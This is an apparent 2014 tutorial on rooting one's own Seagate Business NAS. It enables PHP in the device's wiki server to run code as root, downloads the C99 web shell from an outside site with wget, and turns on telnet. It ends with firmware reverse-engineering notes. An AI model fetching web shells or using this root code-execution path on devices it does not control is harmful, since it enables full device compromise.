SEAGATE BUSINESS NAS ACCESSING THE SHELL February 1, 2014 by Jeroen Diel IT Nerdbox
P a g e 1 Table of Contents Introduction... 2 Technical specifications... 3 Gaining access to the shell... 4 Enable the Wiki server... 5 Configure the Wiki Server... 6 Create a new Wiki Page... 7 Enable the telnet daemon... 9 Adding users and change passwords... 9 Other thoughts... 10 Reverse engineering the file system... 10 Analyzing uimage & u-boot... 14
P a g e 2 Introduction The Seagate Business NAS is a file server that is used to store and share your data across your Local Area Network (LAN). The operating system on the Seagate Business NAS is Linux based, however, by default you will only get access to a web interface to control your device. As a technical person, it is preferred to have full control over your devices. However, Seagate decided not to allow this by default. This document describes how it is possible to get shell access using telnet. Being able to execute commands as root may cause your device to fail beyond recovery. If you are not familiar with Linux operating systems, this document is probably not for you. IT Nerdbox cannot be held responsible in case your device crashes or fails beyond recovery. By using this document, you agree to all the terms described in this section.
P a g e 3 Technical specifications The following table shows the technical specification regarding the Seagate Business NAS with firmware version 2013.60311. Software Version Kernel BusyBox v1.13.2-2.6.35.13-cavm1.whitney-econa.whitney-econa #2 Thu Jul 18 14:51:22 PDT 2013 armv6l Web Server PHP Lighttpd/1.4.28 PHP/5.2.13 FTP Server vsftpd 2.3.4
P a g e 4 Gaining access to the shell This section will describe how to gain shell access to Business NAS by enabling the telnet daemon. It is required to perform several steps in order to do so. Background information For those who are interested in some background information on how it is possible to gain shell access, please keep on reading. First the Wiki server has to be enabled, this is required because with the right configuration in the wiki server, it is possible to execute PHP code. The web server is running under the root account, this is required to perform certain administrative actions on the Business NAS. PHP is configured to allow all its functions, such as system and exec. By knowing these facts, it is possible to execute PHP code as the root user. By having this information it is possible to download a web shell. A web shell is a web page that is able to communicate with the operating system installed on the server using the execution environment of the web scripting language, PHP in this case. Once the web shell is loaded it is possible to execute operating system commands in an easy way. It even allows us to modify (configuration) files, suchs as the inetd.conf.
P a g e 5 Enable the Wiki server First it is required to enable the wiki server on the business NAS. In order to do so, use the following steps: 1. Log in to your Business NAS, using the administrative web interface. 2. Go to Sharing. 3. Click on Wiki Server. 4. Enter a share name, select a volume and select the enable box. Once the business NAS is done configuring the wiki share, the Go to Wiki Server button will be enabled. Click this button to go to the new wiki server.
P a g e 6 Configure the Wiki Server Once you are on the wiki page, use the login button to login. The same admin credentials can be used to login the administrative web interface of the Business NAS. Once logged in as an administrator, it is required to configure the options. In the configuration options, enable PHP and save the configuration.
P a g e 7 Create a new Wiki Page The next step is to create a new wiki page. Since PHP is enabled for Wiki pages in the previous step it is possible to execute PHP code as root. By using the <php> and </php> tags the wiki server allows the execution of PHP code. Use the following code to download the C99 web shell: <php> </php> exec( wget O shell.php http://www.c99txt.net/s/c99.txt ); Important side notes: It is important to understand that downloading a web shell to your NAS which is directly connected or available over the internet is dangerous. Anyone who is able finds this shell, has full access to your Business NAS and is able to fully compromise it. Please remove this file once you are done gaining access to the shell. Another important note is that it generally is a bad idea to allow access to any device over the internet. A good example is the Black Armor NAS for which I have written a remote root exploit. This allows anyone to take any Black Armor NAS. If it is required to have your administrative interface available over the internet, it is highly recommended to consider implementing IP restrictions for these interfaces.
P a g e 8 Once the code has been saved, click on the Show page button. Now, it seems like nothing happened, however, the PHP code downloads the c99.txt file and saves it as shell.php at the following location: http://<ip>/dokuwiki/shell.php Use your browser to go to this location. If everything went right, you should be able to see a similar screen as the screenshot below.
P a g e 9 Enable the telnet daemon In this next step, the telnet daemon will be enabled at boot. Using the web shell, navigate to the /etc/ directory and edit the file called inetd.conf. In this file, a line is commented out by the # sign at the beginning of the line. The line that needs to be enabled is: telnet stream tcp nowait root /usr/sbin/telnetd /usr/sbin/telnetd Just remove the # sign from the beginning and save the file. Now either restart inetd or reboot the NAS and the telnet daemon will be enabled. Adding users and change passwords Using the web shell, it is possible to execute certain commands to the operating system. It is useful to create new shell users and/or change the root password. Description: Add a user to the system Change a user s password Change the root password One line command: adduser <username> echo password passwd <username> echo password passwd echo password passwd root
P a g e 10 Other thoughts This section describes some of the other thoughts I have regarding the Seagate Business NAS. If you are a developer and feel like sharing idea s with me, feel free to contact me. Perhaps it is possible to set up certain projects together in order to get the most out of the Business NAS. Reverse engineering the file system Downloading the latest firmware shows two files, an.img file and a.md5 file. Extract the files to a new location. Now use WinRar to extract the.img file. While doing so a new file called is found. Since the extracted file does not have a file extension, it needs to be inspected to see what type of file it is.
P a g e 11 The file seagate_nas-update-1360311-2bay was copied to one of the Linux Virtual Machines for further inspection. Using the Linux command file it is possible to identify files. As displayed in the screenshot, the file is a tar archive which means we can extract it using the tar command: Squashfs is a compressed read-only file system for Linux. Using the command file again will display more information about this file system:
P a g e 12 Extracting the rfs.squashfs file (you might need to install the squashfs-tools): The squashfs file system has been extracted in the directory squashfs-root.
P a g e 13 This directory contains the content which was seen before using the web shell interface if you had browsed to the root (/) of the file system. It is possible to make changes to the file system and create a new file called rfs.squashfs using the command mksquashfs. It seems to be possible to write your own firmware for this Business NAS. It is currently unknown what kind of checks the Seagate Business NAS performs in order for you to upload a modified firmware. A detailed analysis of the firmware upgrade process might be required. The config.ser file might have to be modified as well since it contains MD5 hashes for the file system and the kernel.
P a g e 14 Analyzing uimage & u-boot uboot is an open source Universal Boot Loader which is frequently used in Linux based operating systems and uimage is the kernel image. Binwalk is a firmware analysis tool designed for analyzing, reverse engineering and extracting data contained in firmware images. Analyzing both files: